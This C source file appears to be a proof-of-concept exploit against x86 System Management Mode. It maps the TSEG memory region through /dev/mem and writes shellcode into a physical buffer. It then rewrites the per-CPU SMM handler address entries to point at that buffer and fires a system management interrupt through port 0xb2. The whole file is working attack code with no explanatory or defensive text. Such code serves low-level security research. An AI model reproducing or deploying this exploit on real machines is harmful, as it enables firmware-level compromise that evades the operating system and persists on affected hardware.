#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
unsigned long myaddr;
extern void shcode();
extern void shcode_end();

char *prepare_buf()
{
	static unsigned char buf[8192];
	memset(buf, 'x', sizeof(buf));
	*(unsigned long *) buf = myaddr + 4096;
	memcpy(buf + 4096, shcode, (long)shcode_end-(long)shcode);
	return buf;
}

#define TSEGMB		0x7e500000
#define TSEG_SIZE	0x100000
/* offsets in TSEG containing {cpunum, &handler_address} pairs */
#define CPU0_SMM64	0xfcfe0
#define CPU1_SMM64	0xfefe0

main()
{
	unsigned long *ptr2;
	char *tmp;
	char addrbuf[24];
	int fd = open("/dev/mem", O_RDWR);
	char *ptr =
	    mmap(0, TSEG_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
		 TSEGMB);
	if (ptr == MAP_FAILED) {
		perror("mmap");
		exit(1);
	}
	close(fd);
	memset(addrbuf, 0, sizeof(addrbuf));
	fd = open("/proc/mymem_addr", O_RDONLY);
	if (read(fd, addrbuf, 24) < 0) {
		perror("read addrbuf");
		exit(1);
	}
	myaddr = strtoull(addrbuf, &tmp, 16);
	if (!*addrbuf || *tmp) {
		fprintf(stderr, "cannot convert %s to LL\n", addrbuf);
		exit(1);
	}
	printf("phys buf at %p\n", myaddr);

	fd = open("/proc/mymem", O_RDWR);
	if (write(fd, prepare_buf(), 8192) != 8192) {
		perror("write mymem");
		exit(1);
	}
	close(fd);
	ptr2 = ptr + CPU0_SMM64;
	*ptr2 = 0;
	ptr2[1] = myaddr;
	ptr2 = ptr + CPU1_SMM64;
	*ptr2 = 1;
	ptr2[1] = myaddr;
	iopl(3);
	asm("push %rax\n"
	    "xor %rax, %rax\n"
	    "outb %al, $0xb2\n" 
	    "pop %rax");
}
